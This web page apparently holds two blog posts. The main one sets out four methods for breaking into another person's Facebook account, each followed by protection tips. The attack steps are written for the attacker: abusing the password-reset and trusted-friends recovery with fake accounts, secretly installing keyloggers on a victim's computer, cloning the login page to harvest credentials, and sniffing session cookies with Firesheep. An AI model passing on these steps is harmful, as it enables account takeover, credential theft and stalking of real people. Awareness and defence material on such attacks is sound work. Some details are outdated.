Do not give any Facebook application that claims to show you who's viewed your profile access to your account data, and do not download any third-party program onto your computer that promises the same. They do not work. These are basic phishing attempts meant to spam you and your friends or steal your login data. Never click any links on facebook claiming to know who viewed yours, or your friends profiles. They're all scams. Guaranteed.

Will There Ever Be a Way?

So, while there is no current way to see who has actually viewed your Facebook profile, you can see who has recently been in some sort of contact with you through the InitialChatFriendsList, and see who has viewed your comments or posts in a Group or Message.

Given the number of (fairly successful) scams based on seeing who's viewed your profile, it's clear that the demand for such a feature is there. But the current anonymity does allow for worry-free browsing of friends profiles without worrying about them thinking (realizing?) you're stalking them. It's a delicate balance that I doubt they'll change, as doing so would ultimately change many people's behavior on the site.

Let us know in the comments if you think Facebook should create a "Viewed By" feature or if you like the anonymity as that's currently provided

hacks, how-to, social, tips-tricks | HT | 09:40 No comments Read More

4 Ways to Crack a Facebook Password and How to Protect Yourself from Them

Despite the security concerns that have plagued Facebook for years, most people are sticking around and new members keep on joining. This has led Facebook to break records numbers with over one billion monthly active users as of October 2012—and around 600 million active daily users.

We share our lives on Facebook. We share our birthdays and our anniversaries. We share our vacation plans and locations. We share the births of our sons and the deaths of our fathers. We share our most cherished moments and our most painful thoughts. We divulge every aspect of our lives. We even clamor to see the latest versions even before they're ready for primetime.

But we sometimes forget who's watching.

We use Facebook as a tool to connect, but there are those people who use that connectivity for malicious purposes. We reveal what others can use against us. They know when we're not home and for how long we're gone. They know the answers to our security questions. People can practically steal our identities—and that's just with the visible information we purposely give away through our public Facebook profile.

The scariest part is that as we get more comfortable with advances in technology, we actually become more susceptible to hacking. As if we haven't already done enough to aid hackers in their quest for our data by sharing publicly, those in the know can get into our emails and Facebook accounts to steal every other part of our lives that we intended to keep away from prying eyes.

In fact, you don't even have to be a professional hacker to get into someone's Facebook account.

It can be as easy as running Firesheep on your computer for a few minutes. In fact, Facebook actually allows people to get into someone else's Facebook account without knowing their password. All you have to do is choose three friends to send a code to. You type in the three codes, and voilà—you're into the account. It's as easy as that.

In this article I'll show you these, and a couple other ways that hackers (and even regular folks) can hack into someone's Facebook account. But don't worry, I'll also show you how to prevent it from happening to you.

Method 1: Reset the Password

The easiest way to "hack" into someone's Facebook is through resetting the password. This could be easier done by people who are friends with the person they're trying to hack.

• The first step would be to get your friend's Facebook email login. If you don't already know it, try looking on their Facebook page in the Contact Info section.
• Next, click on Forgotten your password? and type in the victim's email. Their account should come up. Click This is my account.
• It will ask if you would like to reset the password via the victim's emails. This doesn't help, so press No longer have access to these?
• It will now ask How can we reach you? Type in an email that you have that also isn't linked to any other Facebook account.
• It will now ask you a question. If you're close friends with the victim, that's great. If you don't know too much about them, make an educated guess. If you figure it out, you can change the password. Now you have to wait 24 hours to login to their account.
• If you don't figure out the question, you can click on Recover your account with help from friends. This allows you to choose between three and five friends.

• It will send them passwords, which you may ask them for, and then type into the next page. You can either create three to five fake Facebook accounts and add your friend (especially if they just add anyone), or you can choose three to five close friends of yours that would be willing to give you the password.

How to Protect Yourself

• Use an email address specifically for your Facebook and don't put that email address on your profile.
• When choosing a security question and answer, make it difficult. Make it so that no one can figure it out by simply going through your Facebook. No pet names, no anniversaries—not even third grade teacher's names. It's as easy as looking through a yearbook.
• Learn about recovering your account from friends. You can select the three friends you want the password sent to. That way you can protect yourself from a friend and other mutual friends ganging up on you to get into your account.

Method 2: Use a Keylogger

Software Keylogger

A software keylogger is a program that can record each stroke on the keyboard that the user makes, most often without their knowledge. The software has to be downloaded manually on the victim's computer. It will automatically start capturing keystrokes as soon as the computer is turned on and remain undetected in the background. The software can be programmed to send you a summary of all the keystrokes via email.

CNET has Free Keylogger, which as the title suggests, is free. If this isn't what you're looking for, you can search for other free keyloggers or pay for one.

Hardware Keylogger

These work the same way as the software keylogger, except that a USB drive with the software needs to be connected to the victim's computer. The USB drive will save a summary of the keystrokes, so it's as simple as plugging it to your own computer and extracting the data. You can look through Keelog for prices, but it's bit higher than buying the software since you have the buy the USB drive with the program already on it.

How to Protect Yourself

• Use a firewall. Keyloggers usually send information through the internet, so a firewall will monitor your computer's online activity and sniff out anything suspicious.
• Install a password manager. Keyloggers can't steal what you don't type. Password mangers automatically fill out important forms without you having to type anything in.
• Update your software. Once a company knows of any exploits in their software, they work on an update. Stay behind and you could be susceptible.
• Change passwords. If you still don't feel protected, you can change your password bi-weekly. It may seem drastic, but it renders any information a hacker stole useless.

Method 3: Phishing

This option is much more difficult than the rest, but it is also the most common method to hack someone's account. The most popular type ofphishing involves creating a fake login page. The page can be sent via email to your victim and will look exactly like the Facebook login page. If the victim logs in, the information will be sent to you instead of to Facebook. This process is difficult because you will need to create a web hosting account and a fake login page.

The easiest way to do this would be to follow our guide on how to clone a website to make an exact copy of the facebook login page. Then you'll just need to tweak the submit form to copy / store / email the login details a victim enters. If you need help with the exact steps, there are detailed instructions available by Alex Long here on Null Byte. Users are very careful now with logging into Facebook through other links, though, and email phishing filters are getting better every day, so that only adds to this already difficult process. But, it's still possible, especially if you clone the entire Facebook website.

How to Protect Yourself

• Don't click on links through email. If an email tells you to login to Facebook through a link, be wary. First check the URL (Here's a great guide on what to look out for). If you're still doubtful, go directly to the main website and login the way you usually do.
• Phishing isn't only done through email. It can be any link on any website / chat room / text message / etc. Even ads that pop up can be malicious. Don't click on any sketchy looking links that ask for your information.
• Use anti-virus & web security software, like Norton or McAfee.

Method 4: Stealing Cookies

Cookies allow a website to store information on a user's hard drive and later retrieve it. These cookies contain important information used to track a session that a hacker can sniff out and steal if they are on the same Wi-Fi network as the victim. They don't actually get the login passwords, but they can still access the victim's account by cloning the cookies, tricking Facebook into thinking the hacker's browser is already authenticated.

Image via wikimedia.org

Firesheep is a Firefox add-on that sniffs web traffic on an open Wi-Fi connection. It collects the cookies and stores them in a tab on the side of the browser.

From there, the hacker can click on the saved cookies and access the victim's account, as long as the victim is still logged in. Once the victim logs out, it is impossible for the hacker to access the account.

How to Protect Yourself

• On Facebook, go to your Account Settings and check under Security. Make sure Secure Browsing is enabled. Firesheep can't sniff out cookies over encrypted connections like HTTPS, so try to steer away from HTTP.
• Full time SSL. Use Firefox add-ons such as HTTPS-Everywhere or Force-TLS.
• Log off a website when you're done. Firesheep can't stay logged in to your account if you log off.
• Use only trustworthy Wi-Fi networks. A hacker can be sitting across from you at Starbucks and looking through your email without you knowing it.
• Use a VPN. These protect against any sidejacking from the same WiFi network, no matter what website you're on as all your network traffic will be encrypted all the way to your VPN provider.

Protecting Yourself: Less Is More

Social networking websites are great ways to stay connected with old friends and meet new people. Creating an event, sending a birthday greeting and telling your parents you love them are all a couple of clicks away.

Facebook isn't something you need to steer away from, but you do need to be aware of your surroundings and make smart decisions about what you put up on your profile. The less information you give out on Facebook for everyone to see, the more difficult you make it for hackers.

If your Facebook account ever gets hacked, check out our guide on getting your hacked Facebook account back for information on restoring your account.

hacks, how-to, social, tips-tricks | HT | 09:39 No comments Read More